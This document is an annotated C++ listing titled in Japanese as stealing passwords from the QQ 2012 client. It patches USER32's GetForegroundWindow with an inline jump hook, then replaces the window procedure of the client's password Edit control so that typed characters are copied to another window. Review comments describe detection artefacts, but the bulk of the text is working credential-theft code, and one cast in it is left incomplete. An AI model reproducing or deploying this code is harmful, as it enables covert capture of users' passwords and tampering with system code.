QQ 2012クライアントのパスワードを盗む
/*
* CalePatchAddr: overwrites the first 5 bytes of USER32!GetForegroundWindow in
* the current process with a relative jmp (0xE9) to a freshly allocated stub
* whose first instruction is ret (0xC3). After the patch, in-process calls to
* GetForegroundWindow return at once without running the real function.
* NOTE(review): the original header comment is garbled; it names
* GetForegroundWindow and QQ, so the patch presumably targets a
* foreground-window check made by the client - confirm.
*
* Returns TRUE unconditionally; no API result is checked along the way.
*
* Defensive notes: this is an inline (prologue) hook on a system DLL export.
* The artefacts it leaves are a private PAGE_EXECUTE_READWRITE allocation, a
* protection change on a USER32 code page that is never restored (oData is
* not used again), and export bytes that differ from the on-disk image.
* Comparing loaded code pages against the signed file, and alerting on
* protection changes that make system-DLL code writable, surface it.
*/
BOOL CalePatchAddr()
{
// Address of the export to be patched, resolved in the current process.
FARPROC FuncAddr = GetProcAddress(GetModuleHandle(_T("USER32.DLL")), "GetForegroundWindow");
// Replacement stub: returns immediately. It does not set a return value, so
// callers presumably see whatever the return register already held.
byte HookCode[] = {0xC3/*ret*/, 0x90/*nop*/, 0x90, 0x90, 0x90};
// The stub lives in a new read/write/execute region that is never freed here.
LPVOID CodeAddr = VirtualAlloc(0, 5, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(CodeAddr, HookCode, 5);
// Receives the previous page protection; it is not used to restore it.
ULONG oData;
VirtualProtect(FuncAddr, 5, PAGE_EXECUTE_READWRITE, &oData);
// 5-byte near jump; the 4-byte displacement is filled in below.
byte NewCode[] = { 0xE9 /*jmp*/, 0, 0, 0, 0 };
// rel32 = target - (address of jmp + 5). The DWORD casts imply 32-bit addresses.
DWORD off = (DWORD)CodeAddr - (DWORD)FuncAddr - 5;
memcpy(&NewCode[1], &off, 4);
// Overwrite the function prologue in place; the original bytes are not saved.
memcpy(FuncAddr, NewCode, 5);
return TRUE;
}
// Window procedure the targeted control had before InstallHook replaced it;
// WndProc2 chains to it so the control keeps working.
WNDPROC pswd_proc = NULL;
// Window that receives a copy of every message WndProc2 sees. It is never
// assigned in the visible listing - TODO confirm where it is set.
HWND recv_hwnd = NULL;
// WndProc2: replacement window procedure installed on the control found by
// InstallHook. It duplicates every message to recv_hwnd and then hands the
// message to the original procedure, returning that procedure's result.
//
// Security impact: the copy is unfiltered, so character and key messages typed
// into the control reach a second window. If the control is the password field
// (as the naming suggests), this discloses the password as it is typed.
// Defensive note: a credential field whose window procedure points outside the
// application's own modules is a strong indicator of this kind of tampering.
LRESULT CALLBACK WndProc2(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
// Synchronous copy of the message to the receiving window; result ignored.
SendMessage((HWND)recv_hwnd, message, wParam, lParam);
// Chain to the saved original procedure so the control behaves as before.
return ::CallWindowProc(pswd_proc, hWnd, message, wParam, lParam);
}
// InstallHook: locates the client's top-level window by class and title, takes
// its first child of class "Edit", saves that control's window procedure in
// pswd_proc and replaces it with WndProc2 (window subclassing).
// Shows a message box and returns early if either window is not found.
//
// Defensive notes: the lookup depends on a fixed class name and window title,
// and the tampering is visible as a changed GWL_WNDPROC value on the control.
// An application can compare that value with the one it expects; endpoint
// tooling can flag window-procedure changes on credential fields.
// NOTE(review): how this code comes to run where the subclass call succeeds is
// not shown in this listing.
void InstallHook()
{
// Top-level window matched by class "TXGuiFoundation" and title "QQ2012".
HWND QQ_hwnd = ::FindWindow(_T("TXGuiFoundation"), _T("QQ2012"));
if (QQ_hwnd == NULL)
{
AfxMessageBox(_T("QQ not found!"));
return;
}
HWND pswd_hwnd = FindWindowEx(QQ_hwnd, 0, _T("Edit"), 0); // first child of class "Edit"; assumed to be the password field - confirm
if (pswd_hwnd == NULL)
{
AfxMessageBox(_T("pswd HWND not found!"));
return;
}
// Save the current window procedure, then install WndProc2 in its place.
// NOTE(review): the cast below has no template argument in this listing
// (likely stripped as markup); the line is left as found.
pswd_proc = reinterpret_cast(GetWindowLong(pswd_hwnd, GWL_WNDPROC));
// The result is stored in ret and never examined.
long ret = SetWindowLong(pswd_hwnd, GWL_WNDPROC, (long)WndProc2);
}